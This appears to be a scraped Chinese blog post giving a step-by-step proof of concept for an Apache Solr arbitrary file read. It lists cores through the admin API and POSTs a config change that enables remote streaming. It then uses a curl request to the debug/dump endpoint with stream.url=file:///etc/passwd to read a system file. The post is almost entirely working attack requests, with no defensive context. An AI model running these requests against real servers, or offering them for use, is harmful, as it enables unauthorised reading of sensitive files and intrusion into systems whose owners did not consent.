0x01.
1.创建一个新的项目
2.POC读取core信息
http://IP:port/solr/admin/cores?indexInfo=false&wt=json
3.获取new_core
POST /solr/new_core/config HTTP/1.1
Host: your ip
Content-Length: 80
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/json
Origin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfnc
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
4.读取文件
curl "IP:Port/solr/new_core/debug/dump?param=ContentStreams" -F "stream.url=file:///etc/passwd"
浙公网安备 33010602011771号